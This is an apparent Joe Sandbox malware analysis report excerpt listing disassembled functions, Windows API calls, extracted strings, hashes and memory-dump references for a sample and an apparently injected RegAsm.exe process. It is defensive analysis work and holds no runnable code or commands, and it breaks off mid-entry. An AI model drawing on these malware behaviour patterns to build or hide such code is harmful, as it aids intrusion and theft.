FlsGetValue.KERNEL32 ref: 00007FF7D77F8675
FlsSetValue.KERNEL32 ref: 00007FF7D77F8694
FlsSetValue.KERNEL32 ref: 00007FF7D77F86BC
FlsSetValue.KERNEL32 ref: 00007FF7D77F86CD
FlsSetValue.KERNEL32 ref: 00007FF7D77F86DE

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: aeb026a7d296a4fa981301e693c9e87122c71079e3c21639fcbda75acb793160
Instruction ID: 816ae187853155cc04b3144243f2fdb8168ebddb5b789e03e1369469cba53999
Opcode Fuzzy Hash: aeb026a7d296a4fa981301e693c9e87122c71079e3c21639fcbda75acb793160
Instruction Fuzzy Hash: CD111550A4921386F968B7715A521BED1825F4A335FD84F36ED3E0A2E2DE2CB4834A71

Function 00007FF7D77FA194 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,COMSPEC,00007FF7D77F5BBB,?,?,00000000,00007FF7D77F5E9A), ref: 00007FF7D77FA1AD
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,COMSPEC,00007FF7D77F5BBB,?,?,00000000,00007FF7D77F5E9A), ref: 00007FF7D77FA21F

Part of subcall function 00007FF7D77FB070: HeapAlloc.KERNEL32(?,?,FFFFFFFD,00007FF7D77F999B), ref: 00007FF7D77FB0AE

FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,COMSPEC,00007FF7D77F5BBB,?,?,00000000,00007FF7D77F5E9A), ref: 00007FF7D77FA27E

Part of subcall function 00007FF7D77F71DC: HeapFree.KERNEL32(?,?,22E8F98BF28B4820,00007FF7D77FAF52,?,?,?,00007FF7D77FAF8F,?,?,00000000,00007FF7D77FB4B5,?,?,00007FF7D77F54BB,00007FF7D77FB3E7), ref: 00007FF7D77F71F2
Part of subcall function 00007FF7D77F71DC: GetLastError.KERNEL32(?,?,22E8F98BF28B4820,00007FF7D77FAF52,?,?,?,00007FF7D77FAF8F,?,?,00000000,00007FF7D77FB4B5,?,?,00007FF7D77F54BB,00007FF7D77FB3E7), ref: 00007FF7D77F71FC

Strings

COMSPEC, xrefs: 00007FF7D77FA1A7

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID: COMSPEC
API String ID: 3331406755-1631433037
Opcode ID: 5404f3279ac07d541c68fe5249167e5e9fee70a936e98de270877ffd1baa10d2
Instruction ID: d41636801c4cb9f3ce112d934ca67d10fbd3600ceb1c9a109eea03be66ffcff5
Opcode Fuzzy Hash: 5404f3279ac07d541c68fe5249167e5e9fee70a936e98de270877ffd1baa10d2
Instruction Fuzzy Hash: B931A621E18B4185E724AF25694007EF6A4BBC9BE4FC54936EE4E53BD5DF3CE4424214

Function 00007FF7D77FE430 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7D77FE4AF
WriteFile.KERNEL32 ref: 00007FF7D77FE777
WriteFile.KERNEL32 ref: 00007FF7D77FE7BD
GetLastError.KERNEL32 ref: 00007FF7D77FE873

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 062aaaa8b83d1f6d98b11906aad4461370a7e96d943de9789ace639ddc18cee1
Instruction ID: df3ad35f7eca5587307dcd918a3eee50c257f1c8fd1f599e51be488accbca003
Opcode Fuzzy Hash: 062aaaa8b83d1f6d98b11906aad4461370a7e96d943de9789ace639ddc18cee1
Instruction Fuzzy Hash: B1D1D032B18A8189E710DF65D5402ACB7B2FB487E8F90463ACE5D97B99DE78E447C310

Function 00007FF7D77F35A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7D77F35FF

Strings

RCC, xrefs: 00007FF7D77F361B
MOC, xrefs: 00007FF7D77F3613

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4cc05a13dbd691478e9753dbc6ace1f93ecb855416882bdef743b22574f75cda
Instruction ID: 04ac59daa45ec119f9696eface9ad6f0af16be53a506923b20a0a755c220ae95
Opcode Fuzzy Hash: 4cc05a13dbd691478e9753dbc6ace1f93ecb855416882bdef743b22574f75cda
Instruction Fuzzy Hash: FB619F72908BC581D760AB15E5803AEF7A0FB89BA4F844626EF8C03B55DF3CD091CB10

Function 00007FF7D77FEAC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7D77FEBDF
GetLastError.KERNEL32 ref: 00007FF7D77FEC01

Strings

U, xrefs: 00007FF7D77FEB8B

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 701151f88204e3d65cc407c3b76db480a1853325d01e99f5eff3c3a30a45588c
Instruction ID: fec83bab4fc547159c6e084a14731d641a7902991132e81ecaa9a0a43fa81352
Opcode Fuzzy Hash: 701151f88204e3d65cc407c3b76db480a1853325d01e99f5eff3c3a30a45588c
Instruction Fuzzy Hash: B741B422A18B8185DB20EF25E5447ADE7A0FB88794FC04536EE8E87798DF7CD542C750

Function 00007FF7D77F43F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7D77F4448
RaiseException.KERNEL32 ref: 00007FF7D77F4489

Strings

csm, xrefs: 00007FF7D77F4476

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: e281b008d8b40c43a578bcedb96368d40f4b3dcf69cf36e96c47b0eb34efe405
Instruction ID: 6b4a833b595e815fe221554ad1fa33c5ce46c28e4b30ec0a732e4d6c63a4c082
Opcode Fuzzy Hash: e281b008d8b40c43a578bcedb96368d40f4b3dcf69cf36e96c47b0eb34efe405
Instruction Fuzzy Hash: 16115B32609B8182EB20AB15F50026DFBE0FB88B94F988635EF8D17B54DF3CC5528B00

Analysis Process: RegAsm.exePID: 1752, Parent PID: 9176COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	55%
Total number of Nodes:	400
Total number of Limit Nodes:	16

Executed Functions

Function 004358F0 Relevance: 32.1, APIs: 11, Strings: 7, Instructions: 569
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00442AB8,00000000,00000001,00442AA8,00000000), ref: 00435A29
SysAllocString.OLEAUT32(v'w!), ref: 00435AA5
CoSetProxyBlanket.COMBASE(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435AEB
SysAllocString.OLEAUT32(69DD6BDD), ref: 00435B67
SysAllocString.OLEAUT32(89518B21), ref: 00435C13
VariantInit.OLEAUT32(?), ref: 00435C8C

Strings

|{, xrefs: 00435BCF
SQ, xrefs: 00435918
v'w!, xrefs: 00435A8C
03, xrefs: 00435A62
c;m5, xrefs: 00435A52
C, xrefs: 004359DE
\, xrefs: 004359E6

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: 03$C$\$c;m5$v'w!$|{$SQ
API String ID: 65563702-3459701557
Opcode ID: 411b126798814c7ae31ce3f4c4342a080b9c8b96268cde334bba22632ad74ce6
Instruction ID: 8ee38e81a9ebfbdc9a92cdf509a7b5b91bc458359a7dce3f43b3968cf6a0eaab
Opcode Fuzzy Hash: 411b126798814c7ae31ce3f4c4342a080b9c8b96268cde334bba22632ad74ce6
Instruction Fuzzy Hash: B4125371A087008FE724CF24C88676BBBE5EF89714F14892EF9959B390D778D905CB86

Function 0041A360 Relevance: 22.8, Strings: 17, Instructions: 1503COMMON

Download Yara Rule

Strings

anol, xrefs: 0041A510
R*, xrefs: 0041A57E
1>?<, xrefs: 0041A594
0123, xrefs: 0041A732
?, xrefs: 0041A78A
*?, xrefs: 0041A589
$%&', xrefs: 0041A6DA
!./7, xrefs: 0041A5C0
XY, xrefs: 0041B5FD
X_, xrefs: 0041AB2F
, xrefs: 0041AC8B
x, xrefs: 0041ABAE
AC, xrefs: 0041B1CD
ecw, xrefs: 0041B4F0
<=>?, xrefs: 0041A727
LM, xrefs: 0041B1D5
URSP, xrefs: 0041A531

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ecw$ $!./7$$%&'$0123$1>?<$<=>?$LM$R*$URSP$XY$X_$anol$x$*?$AC$?
API String ID: 0-1210905185
Opcode ID: a9be98e2474fa90a6622ee020cfe931119c706e0c8204bdeb6a2b467142a0712
Instruction ID: 05554d4b74cb37f00c522ddf28400aba285cffaf9a4d0509761738ac056082fa
Opcode Fuzzy Hash: a9be98e2474fa90a6622ee020cfe931119c706e0c8204bdeb6a2b467142a0712
Instruction Fuzzy Hash: 19B29D701093818BD7248F25C8957EBBBE1EFD6314F18896EE4C98B391D7788849CB97

Function 00421A80 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

q"B, xrefs: 0042226B
uz, xrefs: 00421F8B
wvy, xrefs: 00421D43
sXu, xrefs: 00421ED1
^gPa, xrefs: 00421F74
] @, xrefs: 00421EED
v~, xrefs: 00421FA3
{=, xrefs: 00421F93
tw, xrefs: 00421ED9

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ] @$^gPa$q"B$tw$uz$v~${=$sXu$wvy
API String ID: 0-1187496957
Opcode ID: e3650dcdbb4ca8f2df992d684fb0d182d5e335e720cdf4a984b47cdda153cc4d
Instruction ID: 11580da93081b44debf38894fec1cf3a1aeec49c2061deccd092facb7d853063
Opcode Fuzzy Hash: e3650dcdbb4ca8f2df992d684fb0d182d5e335e720cdf4a984b47cdda153cc4d
Instruction Fuzzy Hash: DF02CBB45083509FE3109F25D84072BBBF0EF96758F04892DF9999B391E77889098B9B

Function 00418D6F Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 769
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 0041935D
/, xrefs: 0041940A
v<21, xrefs: 0041931B
j, xrefs: 00419435
.';", xrefs: 00419331

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .';"$j$l$v<21$/
API String ID: 0-2207827235
Opcode ID: f60d948e8d78ff1402df21f8f9092e8a93c385ac855627d3c8486739e539914c
Instruction ID: 45ccb8024782f49f4c41b897b5314fa43147df0c466e0f3adfe0f67a7a172f33
Opcode Fuzzy Hash: f60d948e8d78ff1402df21f8f9092e8a93c385ac855627d3c8486739e539914c
Instruction Fuzzy Hash: D55276B15083808BD7348F25D8957DBBBE1BFD6308F148A2DE4C99B391D7398946CB86

Function 00429C7C Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00429D47
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00429D7D
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00429E29

Strings

JhZv, xrefs: 0042A236
KJI', xrefs: 0042A05F
v, xrefs: 00429D47

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: JhZv$KJI'$v
API String ID: 2243422189-311990566
Opcode ID: 5d78d693f0a6226f00e1cd2abe8cb442437e0ae6caaf3c50373dc2fa9a6773df
Instruction ID: 0265194c4d9e7378626be078c437357245808d6265734e5e666d7c04b72802f9
Opcode Fuzzy Hash: 5d78d693f0a6226f00e1cd2abe8cb442437e0ae6caaf3c50373dc2fa9a6773df
Instruction Fuzzy Hash: 55F1E670204B818FD725CF35D4507A3BBE2AF57304F4889ADC4EA87782D779650ACB66

Function 0041B840 Relevance: 10.7, Strings: 8, Instructions: 731
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

O?A, xrefs: 0041BBEC
5K&M, xrefs: 0041BBE4
E7DI, xrefs: 0041BBDC
1C?E, xrefs: 0041BBF4
?G!Y, xrefs: 0041BBFC
\], xrefs: 0041BE0F
b?Y1, xrefs: 0041BC25
-[Z], xrefs: 0041BC04

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: O?A$-[Z]$1C?E$5K&M$?G!Y$E7DI$\]$b?Y1
API String ID: 0-3992915487
Opcode ID: 146b5233f7ee7f9978c0cad3320db5f975b564feacb40187a2c42cdf7c2a9cda
Instruction ID: 35d513b67ffc3e6f3b7f570dc22d0295eeba515840fa069767b96105834fc068
Opcode Fuzzy Hash: 146b5233f7ee7f9978c0cad3320db5f975b564feacb40187a2c42cdf7c2a9cda
Instruction Fuzzy Hash: BD2222B5508340DFC704CF25D8926ABBBE0EF95314F04892DF4D59B391E7788949CB9A

Function 00418782 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 224
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 00418873
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00418897
IsWindowEnabled.USER32(00000000), ref: 004188BE
IsWindowEnabled.USER32(00000000), ref: 004188C1
IsWindowVisible.USER32(00000000), ref: 004188DC

Strings

,-, xrefs: 0041881A

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Window$Enabled$FindProcessThreadVisible
String ID: ,-
API String ID: 1745434793-1027024164
Opcode ID: 3d2ccc28cd08c91d5d6333337698e4d737dd31ffd2b66f8a9b3d8f61eeeb6b1f
Instruction ID: 56b84fc87cb1ca2f63d5938239228ea87b56aac7768e10c7d6da1a857d4098df
Opcode Fuzzy Hash: 3d2ccc28cd08c91d5d6333337698e4d737dd31ffd2b66f8a9b3d8f61eeeb6b1f
Instruction Fuzzy Hash: 3091B171208782CFC725CF29D8506AFBBE1BFC6304F198A6EE49587392DA34D945CB46

Function 00429C75 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00429D7D
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00429E29

Strings

JhZv, xrefs: 0042A236
KJI', xrefs: 0042A05F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: JhZv$KJI'
API String ID: 3545744682-1972199893
Opcode ID: e5d14e3a6780a93f6ef3399222aa12012372fe2bcf5fc96e370c7a7916d26253
Instruction ID: 45cd97e3f39545d266e0ca7d1123ce29aeaad83fbb4faaee60ad309aa47ec7e8
Opcode Fuzzy Hash: e5d14e3a6780a93f6ef3399222aa12012372fe2bcf5fc96e370c7a7916d26253
Instruction Fuzzy Hash: D2F10730304B818BD725CF35D4907A3FBE2AF96314F488A6EC4EA47786D779A40AC756

Function 00418602 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowExW.USER32(00000000,?,?,00000000), ref: 00418692
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041876D
GetWindowThreadProcessId.USER32(?,00000000), ref: 00418776

Strings

<=, xrefs: 0041865A

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Window$ProcessThread$Find
String ID: <=
API String ID: 1729321468-1782720273
Opcode ID: d3492a7d5e526fc87329d80c09a87ff4cf5b8b09f9a5eede5d923626e6db5ca8
Instruction ID: 1de689ebf0d195e78d33ca8b3caddefcbfdc312f4367fcf791db92f2621f5657
Opcode Fuzzy Hash: d3492a7d5e526fc87329d80c09a87ff4cf5b8b09f9a5eede5d923626e6db5ca8
Instruction Fuzzy Hash: E0416A78608781CFD7208F28E89478BB7F1FB8A306F14487CE18897292C730A905CF4A

Function 0043D840 Relevance: 5.7, Strings: 4, Instructions: 736COMMON

Download Yara Rule

Strings

}z{x, xrefs: 0043DDA0
<, xrefs: 0043D97C
|7(, xrefs: 0043DF64
InA>, xrefs: 0043DE20

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: <$InA>$}z{x$|7(
API String ID: 0-3008498783
Opcode ID: f2cecdcd3e361a2e014ab8c53f77bf8355bcc2adbde0a80359934737828f8ad6
Instruction ID: ba6db43fa6947fad4a234946ca23f5e0f67a27b0eedd178c8c14836eec61e73d
Opcode Fuzzy Hash: f2cecdcd3e361a2e014ab8c53f77bf8355bcc2adbde0a80359934737828f8ad6
Instruction Fuzzy Hash: A432D331A083604FD315CF29D89036FBBE1EBD5314F19C92DD8A99B391DB7998068BC6

Function 00439140 Relevance: 5.6, Strings: 4, Instructions: 618COMMON

Download Yara Rule

Strings

f, xrefs: 00439369
}z{x, xrefs: 004391C6
InA>, xrefs: 004394B0
InA>, xrefs: 004391E0

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>$InA>$f$}z{x
API String ID: 2994545307-844105762
Opcode ID: 87b346039ef0ff58d2d297e6186d3740a28f91a0657207179ea152e36d4606d4
Instruction ID: 4c4d201456567d4c56ccc0aeffc3ce956cb08362b783be90ad7721609f75a985
Opcode Fuzzy Hash: 87b346039ef0ff58d2d297e6186d3740a28f91a0657207179ea152e36d4606d4
Instruction Fuzzy Hash: 7B32D0756083419FD714CF29C890B2FBBE2ABC9314F189A2EE4968B391D778DC05CB56

Function 00417502 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 332COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000001), ref: 00417640
ExitProcess.KERNEL32(00000001), ref: 004177B9

Strings

|}, xrefs: 0041781F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: |}
API String ID: 621844428-3974572420
Opcode ID: e2968ba23e1fb9159bc81495b3c9d2b65627d20b62a74ea636a2c7995b96266b
Instruction ID: 8b9c484b879947a4d1af565195316180e6d0e27292e811ae7adbada8751f1822
Opcode Fuzzy Hash: e2968ba23e1fb9159bc81495b3c9d2b65627d20b62a74ea636a2c7995b96266b
Instruction Fuzzy Hash: 62B11471608340DBC7249F28C8926ABB7F2FF91314F19492EF4958B3A1E738E945C796

Function 00438FC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139nativeCOMMON

Download Yara Rule

APIs

NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 00439086

Strings

}z{x, xrefs: 004390E6

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Memory64ReadVirtualWow64
String ID: }z{x
API String ID: 3357887247-1935807464
Opcode ID: 51343d7b43cf4d9c6f53f27d09aba3500c197e381df7a6820aff55c26c5db536
Instruction ID: d47dfee082f1a6cb48b5d777a32f372a99160bd2ad4a1b1b3f9c320a9d5a41b4
Opcode Fuzzy Hash: 51343d7b43cf4d9c6f53f27d09aba3500c197e381df7a6820aff55c26c5db536
Instruction Fuzzy Hash: 71415836604305ABDB24CF04DC84B6BB7B6EB8D700F14942EF99957241C775DC00DB96

Function 0041D570 Relevance: 3.0, Strings: 2, Instructions: 468COMMON

Download Yara Rule

Strings

,, xrefs: 0041D5B6
31p, xrefs: 0041D93B

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Memory64ReadVirtualWow64
String ID: ,$31p
API String ID: 3357887247-3672193133
Opcode ID: 6390f2fdd262e9f46377bdf7af16135336a0f363ded4eebb316976f3bb70af1e
Instruction ID: 0db7e3a9d10fbc96566f6a30befd23890478b61157418dd703e2a2833b2feb34
Opcode Fuzzy Hash: 6390f2fdd262e9f46377bdf7af16135336a0f363ded4eebb316976f3bb70af1e
Instruction Fuzzy Hash: B2E1F2B1A08350ABD3009F25DC427AFBBE5EFC5314F14892EF8D497382D63999098B97

Function 00439D20 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

InA>, xrefs: 00439DB0
}z{x, xrefs: 00439D96

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>$}z{x
API String ID: 2994545307-3945942619
Opcode ID: fd91b41f8517ad846f729504e3dc611381c999492ec196f8123f0edf07fb5599
Instruction ID: 6a07bf609f58bb5fe5e5209b5a76e29dba01eb35f8b35c3385471842874dc2cd
Opcode Fuzzy Hash: fd91b41f8517ad846f729504e3dc611381c999492ec196f8123f0edf07fb5599
Instruction Fuzzy Hash: 5E7126356083015FD724CE29C89173BB7E2EBC9710F28A53EE99597395D7B8DC018789

Function 0043CCB0 Relevance: 1.7, APIs: 1, Instructions: 222nativeCOMMON

Download Yara Rule

APIs

NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000040), ref: 0043CE1F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: Memory64ReadVirtualWow64
String ID:
API String ID: 3357887247-0
Opcode ID: b32f01d9f52621f1b2d55c900d3373b72ffd37a5ba1f7ab658a65a1f90a5e9cd
Instruction ID: 2961eb3449e9620dd6c4faa6d90811a1abffc03b5a4c17fce246a2b98ba6e4df
Opcode Fuzzy Hash: b32f01d9f52621f1b2d55c900d3373b72ffd37a5ba1f7ab658a65a1f90a5e9cd
Instruction Fuzzy Hash: 556147327047144BD714CA2DCC9172BB7A3EBC9320F29923DE9A56B3E1DA349C028794

Function 0042B503 Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

}z{x, xrefs: 0042B77F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: }z{x
API String ID: 2994545307-1935807464
Opcode ID: aa45980cbac1e231f6e8da8b68cef9a9cf92f57abf15a9337a6b543c2cf2846f
Instruction ID: c622ef9edb583b2cafb03bc8f4f9681344dbf6dda95fbb3d8b8406b624183eef
Opcode Fuzzy Hash: aa45980cbac1e231f6e8da8b68cef9a9cf92f57abf15a9337a6b543c2cf2846f
Instruction Fuzzy Hash: 1F912530204B508FD7258F28D8A07B3BBE2EF92304F59499DC0D78B252D739A815C7AD

Function 0043B600 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

